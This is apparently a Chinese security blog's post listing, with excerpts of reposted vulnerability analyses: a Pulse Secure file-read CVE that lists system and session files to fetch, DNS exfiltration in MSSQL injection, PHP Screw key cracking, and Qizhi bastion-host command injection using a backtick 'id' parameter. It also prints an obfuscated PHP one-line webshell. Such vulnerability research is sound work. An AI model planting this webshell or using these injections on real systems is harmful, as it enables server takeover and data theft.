- 博客(7)
- 收藏
- 关注
RSS订阅转载 Pulse Secure 任意文件读取(CVE-2019-11510)漏洞
漏洞分析我们可以通过CVE-2019-11510这个未授权的任意文件读取漏洞把以下文件下载回来。/etc/passwd/etc/hosts/data/runtime/mtmp/system/data/runtime/mtmp/lmdb/dataa/data.mdb/data/runtime/mtmp/lmdb/dataa/lock.mdb/data/run...
2019-08-31 23:20:00
3185
转载 Data Exfiltration with DNS in MSSQL SQLi attacks
DNS解析过程DNS解析过程DNS 查询的过程如下图1所示。图1文字举例说明:假定浏览器想知道域名xprp8i.dnslog.cn的IP地址。1、浏览器先向本地DNS服务器进行递归查询。2、本地域名服务器采用迭代查询。它先向一个根域名服务器查询。3、根域名服务器告诉本地DNS服务器,下一次应查询的顶级域名服务器a.dns.cn的IP地址。4、本地...
2019-08-29 18:00:00
325
转载 php screw加密与破解
一、破解工具之php-screw-brute1、项目地址 https://github.com/securifybv/php-screw-brute2、项目介绍 此脚本可以恢复/爆破php screw使用的密钥。PHP Screw使用压缩文件的长度来确定(硬编码)密钥的起始索引。PHP Screw的工作原理是首先使用ZLIB(级别1)压缩PHP文件,然后按位取反,再与...
2019-07-30 10:25:00
575
转载 齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)分析
一、基本信息 漏洞公告:https://www.cnvd.org.cn/flaw/show/1632201 补丁信息:该漏洞的修复补丁已发布,如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。二、源代码分析 问题出现在ha_request.php文件,第37行的exec函数,$url为用户可控的变量,可见第33和34行。目光来到第23和24行,只要n...
2019-07-27 21:56:00
3740
转载 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
一、基本信息参考:https://www.cnvd.org.cn/flaw/show/1559039补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。二、漏洞挖掘过程这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。1、挖掘过程首先,在安装齐治运维堡...
2019-07-17 16:23:00
3986
转载 齐治堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析
基本信息引用:https://www.cnvd.org.cn/flaw/show/CNVD-2019-17294补丁信息:该漏洞的修复补丁已于2019年6月25日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。漏洞复现如下图,通过在传递参数”service=`id`”,成功执行命令,并回显命令执行结果。...
2019-07-16 22:31:00
1333
转载 有趣的PHP一句话
今天看到如下图所示的PHP一句话,觉得挺有意思。代码如下:<?=~$_='$<>/'^'{{{{';echo $_;@${$_}[_](@${$_}[__]);?>效果图:看下图注释应该就可以一目了然了,就是根据异或运算得到$_=’_GET’。如果想换成POST方法,则可变化如下。<?=~$_='$+...
2019-07-16 09:37:00
220
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人